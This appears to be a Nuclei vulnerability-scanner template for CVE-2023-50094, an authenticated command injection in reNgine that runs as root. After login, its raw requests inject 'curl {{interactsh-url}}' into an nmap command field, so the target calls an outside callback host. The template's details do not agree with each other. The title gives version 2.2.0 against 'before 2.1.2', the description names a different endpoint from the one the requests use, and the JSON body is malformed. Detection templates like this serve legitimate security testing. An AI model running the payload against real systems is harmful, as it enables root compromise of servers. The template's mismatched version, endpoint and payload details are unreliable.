id: CVE-2023-50094 info: name: reNgine 2.2.0 - Command Injection author: Zierax severity: high description: | reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output. impact: | Authenticated attackers can inject arbitrary OS commands that execute as root, leading to complete system compromise and data exfiltration. remediation: | Upgrade reNgine to version 2.1.2 or later which includes proper input validation. reference: - https://github.com/yogeshojha/rengine - https://github.com/Zierax/CVE-2023-50094_POC - https://nvd.nist.gov/vuln/detail/CVE-2023-50094 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-50094 cwe-id: CWE-78 epss-score: 0.88564 epss-percentile: 0.99521 cpe: cpe:2.3:a:yogeshojha:rengine:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: yogeshojha product: rengine shodan-query: title:"reNgine" tags: cve,cve2023,rengine,rce,injection,authenticated,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: dsl dsl: - 'contains(tolower(body), "rengine")' internal: true - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - | POST /scan-engine/update HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"nmap_cmd": 'curl {{interactsh-url}}'} matchers: - type: dsl dsl: - 'contains(interactsh_protocol_2, "dns")' - 'status_code_2 == 200' condition: and # digest: 4a0a00473045022100a171ff3951accc4dafd86741a6fba53343ef9a132d57d83484813e2ab3be359a02203de779ebd1e6b5647379c0783e7c1b02882bbf2924736e696ef286a309a87cb4:922c64590222798bb761d5b6d8e72950